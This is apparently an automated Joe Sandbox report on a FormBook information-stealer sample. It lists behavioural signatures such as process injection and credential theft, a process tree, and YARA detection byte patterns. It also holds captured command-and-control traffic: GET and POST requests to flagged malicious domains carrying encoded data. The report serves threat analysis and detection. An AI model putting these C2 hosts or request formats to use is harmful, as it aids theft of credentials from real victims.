Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yZcecBUXN7.exe

Overview

General Information

Sample name:yZcecBUXN7.exe
renamed because original name is a hash value
Original sample name:9cd48f0d93c28ae6559409de23414554.exe
Analysis ID:1435169
MD5:9cd48f0d93c28ae6559409de23414554
SHA1:a6a625d2dce72bf9f7deee747c95ed7f7cf36cd0
SHA256:3ed0095ee2de05e81ac2c954eb0df312d6b919d871b60ce4265acd266be09d3c
Tags:32exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code references suspicious native API functions
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yZcecBUXN7.exe (PID: 6640 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
    • yZcecBUXN7.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\yZcecBUXN7.exe" MD5: 9CD48F0D93C28AE6559409DE23414554)
      • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 3688 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netsh.exe (PID: 6760 cmdline: "C:\Windows\SysWOW64\netsh.exe" MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • jBaxmaKIzqHZYEOPQcTTJTXx.exe (PID: 916 cmdline: "C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x90f43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x7a482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.yZcecBUXN7.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.yZcecBUXN7.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2da63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16fa2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
          • 0x6be6b:$x1: In$J$ct0r
          1.2.yZcecBUXN7.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.yZcecBUXN7.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cc63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x161a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            Click to see the 5 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=Avira URL Cloud: Label: malware
            Source: http://www.bnbuotqakx.shop/0hhg/Avira URL Cloud: Label: malware
            Source: http://www.dhleba51.ru/0hhg/Avira URL Cloud: Label: malware
            Source: http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40=Avira URL Cloud: Label: malware
            Source: http://www.bnbuotqakx.shopAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: bnbuotqakx.shopVirustotal: Detection: 5%Perma Link
            Source: www.vavada-band.ruVirustotal: Detection: 6%Perma Link
            Source: http://www.bettaroom.ru/0hhg/Virustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: yZcecBUXN7.exeReversingLabs: Detection: 28%
            Source: yZcecBUXN7.exeVirustotal: Detection: 37%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: yZcecBUXN7.exeJoe Sandbox ML: detected
            Source: yZcecBUXN7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: yZcecBUXN7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: yZcecBUXN7.exe, 00000000.00000002.1628173538.0000000005330000.00000004.08000000.00040000.00000000.sdmp, yZcecBUXN7.exe, 00000000.00000002.1626818477.0000000002A71000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: netsh.pdb source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000000.1770920776.000000000004E000.00000002.00000001.01000000.00000007.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000000.1972232269.000000000004E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netsh.pdbGCTL source: yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, yZcecBUXN7.exe, 00000001.00000002.1898532114.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000002.00000002.4123319938.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: yZcecBUXN7.exe, yZcecBUXN7.exe, 00000001.00000002.1898747370.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1897494718.0000000001227000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.00000000038DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124173069.0000000003740000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1902030596.000000000358C000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C1B710 FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then xor eax, eax
            Source: Joe Sandbox ViewIP Address: 203.161.50.127 203.161.50.127
            Source: Joe Sandbox ViewIP Address: 195.24.68.5 195.24.68.5
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= HTTP/1.1Host: www.vavada-band.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS+A026fVEbSVoETlWaKPzhT739k4HudG+XQgMpMmykoK0OCVVIx1ieYSqFXq5syzWGOoCFdAiVWKrRgEgzBh9g=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= HTTP/1.1Host: www.dhleba51.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.dainikmirpur.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= HTTP/1.1Host: www.whirledairlines.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.quantummquest.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= HTTP/1.1Host: www.yamiyasheec.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1Host: www.applesolve.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= HTTP/1.1Host: www.xxaiai.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= HTTP/1.1Host: www.dk48.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC+kK/un5r26ew8GYnMJKxFmClF8lXwwqE5TFZd2gxpf2h1MF48x8mm8dpDB1BgTHqwJGV3u14y6bwQsvyQrq4dK8= HTTP/1.1Host: www.cucuzeus88.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.vavada-band.ru
            Source: global trafficDNS traffic detected: DNS query: www.bettaroom.ru
            Source: global trafficDNS traffic detected: DNS query: www.dhleba51.ru
            Source: global trafficDNS traffic detected: DNS query: www.dainikmirpur.com
            Source: global trafficDNS traffic detected: DNS query: www.whirledairlines.com
            Source: global trafficDNS traffic detected: DNS query: www.quantummquest.top
            Source: global trafficDNS traffic detected: DNS query: www.yamiyasheec.online
            Source: global trafficDNS traffic detected: DNS query: www.applesolve.com
            Source: global trafficDNS traffic detected: DNS query: www.xxaiai.top
            Source: global trafficDNS traffic detected: DNS query: www.vaesen.net
            Source: global trafficDNS traffic detected: DNS query: www.dk48.lol
            Source: global trafficDNS traffic detected: DNS query: www.cluird.cloud
            Source: global trafficDNS traffic detected: DNS query: www.cucuzeus88.store
            Source: global trafficDNS traffic detected: DNS query: www.bnbuotqakx.shop
            Source: unknownHTTP traffic detected: POST /0hhg/ HTTP/1.1Host: www.bettaroom.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bettaroom.ruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Content-Length: 205Referer: http://www.bettaroom.ru/0hhg/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 41 42 71 44 57 36 41 38 3d 37 32 47 57 4f 2b 62 4f 47 46 35 32 47 46 58 2f 6b 6a 36 36 75 33 50 6f 77 6d 72 36 50 37 55 49 4d 52 4b 76 2b 32 57 65 66 31 76 38 55 4b 45 75 67 48 57 66 4b 7a 64 6b 30 53 31 6f 37 32 69 75 4e 74 37 72 74 4e 35 46 6a 53 4d 78 59 6d 66 51 64 30 4a 56 7a 54 36 53 4b 70 39 36 70 35 4e 31 6e 47 75 47 73 6d 4d 6a 4a 78 74 54 59 73 6c 71 46 6d 7a 6d 37 74 57 2f 38 37 57 45 66 63 6c 51 76 37 57 77 34 66 46 6b 78 48 70 7a 4a 4c 50 32 51 68 75 79 4c 76 54 71 47 6e 48 57 66 47 6a 32 47 47 48 44 36 68 46 51 49 4b 71 54 71 33 2f 74 58 56 4f 5a 6a 61 57 48 79 69 58 73 4a 44 62 4f 6c 51 3d 3d Data Ascii: ABqDW6A8=72GWO+bOGF52GFX/kj66u3Powmr6P7UIMRKv+2Wef1v8UKEugHWfKzdk0S1o72iuNt7rtN5FjSMxYmfQd0JVzT6SKp96p5N1nGuGsmMjJxtTYslqFmzm7tW/87WEfclQv7Ww4fFkxHpzJLP2QhuyLvTqGnHWfGj2GGHD6hFQIKqTq3/tXVOZjaWHyiXsJDbOlQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 May 2024 06:24:43 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
